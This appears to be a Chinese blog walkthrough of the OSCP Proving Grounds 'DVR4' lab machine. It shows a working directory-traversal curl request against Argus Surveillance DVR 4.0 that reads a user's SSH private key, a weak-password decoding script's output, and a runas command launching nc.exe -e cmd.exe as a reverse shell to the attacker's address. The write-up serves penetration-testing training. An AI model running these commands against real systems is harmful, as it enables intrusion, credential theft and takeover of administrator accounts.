OSCP - Proving Grounds - DVR4

最新推荐文章于 2025-08-05 18:49:56 发布

柴郡猫^O^

最新推荐文章于 2025-08-05 18:49:56 发布

阅读量264

点赞数 3

CC 4.0 BY-SA版权

分类专栏： OSCP 文章标签：网络安全安全性测试安全

本文链接：https://blog.youkuaiyun.com/N61320/article/details/144722303

OSCP 专栏收录该内容

75 篇文章

订阅专栏

主要知识点

本地文件包含漏洞
弱加密的密码
windows runas提权

具体步骤

nmap扫描

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 06:16 UTC
Nmap scan report for 192.168.53.179
Host is up (0.0011s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey: 
|   3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA)
|_  384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http-proxy
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Connection: Keep-Alive
|     Keep-Alive: timeout=15, max=4
|     Content-Type: text/html
|     Content-Length: 985
|     <HTML>
|     <HEAD>
|     <TITLE>
|     Argus Surveillance DVR
|     </TITLE>
|     <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|     <meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
|     <frameset frameborder="no" border="0" rows="75,*,88">
|     <frame name="Top" frameborder="0" scrolling="auto" noresize src="CamerasTopFrame.html" marginwidth="0" marginheight="0"> 
|     <frame name="ActiveXFrame" frameborder="0" scrolling="auto" noresize src="ActiveXIFrame.html" marginwidth="0" marginheight="0">
|     <frame name="CamerasTable" frameborder="0" scrolling="auto" noresize src="CamerasBottomFrame.html" marginwidth="0" marginheight="0"> 
|     <noframes>
|     <p>This page uses frames, but your browser doesn't support them.</p>
|_    </noframes>
|_http-title: Argus Surveillance DVR
|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC

目前来看8080端口比较有用，并且它开放了Argus Surveillance DVR,访问一下发现版本为4.0

查看一下，得到了几个vulnerabilities

本地文件包含
弱加密的密码(这里不要用ExploitDB里的exp的原因是它不完全，无法解密包含特殊字符的密码）

目前我们不知道具体的remote server用户名都是什么，但是可以尝试一下这两个，至少Administrator是一个合法的用户名

经过尝试，我们可以用如下命令，来得到viewer用户的key文件，可以成功ssh登录

C:\home\kali\Documents\OFFSEC\GoToWork\DVR4> curl "http://192.168.218.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusers%2Fviewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

登录后也可以发现DVRParams.ini文件，其中包含了加密过的Administrator与Viewer的密码

C:\ProgramData\PY_Software\Argus Surveillance DVR>dir
 Volume in drive C has no label.
 Volume Serial Number is 08DF-534D

 Directory of C:\ProgramData\PY_Software\Argus Surveillance DVR

12/24/2024  11:02 PM    <DIR>          .
12/24/2024  11:02 PM    <DIR>          ..
12/24/2024  11:02 PM                38 Argus Surveillance DVR.DVRSes
12/25/2024  12:27 AM             5,822 DVRParams.ini
12/03/2021  12:26 AM    <DIR>          Gallery
12/03/2021  12:24 AM    <DIR>          Images
12/03/2021  12:26 AM    <DIR>          Logs
               2 File(s)          5,860 bytes
               5 Dir(s)   7,591,088,128 bytes free

这里用第二个exp来尝试破解密码，得到了 14WatchD0g$

C:\home\kali\Documents\OFFSEC\GoToWork\DVR4> python exp.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8                 
/home/kali/Documents/OFFSEC/GoToWork/DVR4/exp.py:45: SyntaxWarning: invalid escape sequence '\_'
  banner = '''

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
#                                       #
# Updated by S3L33                      #
#########################################


[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[+] D9A8:$

[+] Password: 14WatchD0g$

这里可以使用windows 的runas的命令来运行 c:\users\viewer\nc.exe来创建 Administrator用户的反弹shell,runas的使用可以参考Runas命令：能让域用户/普通User用户以管理员身份运行指定程序。 - Colin.liu - 博客园

这里首先在本地启动nc -nlvp 80来监听，之后在remote server上运行

C:\Users\viewer>runas /env /profile  /user:DVR4\Administrator "C:\users\viewer\nc.exe -e cmd.exe 192.168.45.157 80"
Enter the password for DVR4\Administrator: 
Attempting to start C:\users\viewer\nc.exe -e cmd.exe 192.168.45.157 80 as user "DVR4\Administrator" ...

而本地则会收到Administrator用户的reverse shell,提权成功

C:\home\kali\Documents\OFFSEC\GoToWork\DVR4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.218.179] 51225
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>whoami /a
whoami /a
ERROR: Invalid argument/option - '/a'.
Type "WHOAMI /?" for usage.

C:\Users\viewer>whoami /all
whoami /all

USER INFORMATION
----------------

User Name          SID                                          
================== =============================================
dvr4\administrator S-1-5-21-2619112490-2635448554-1147358759-500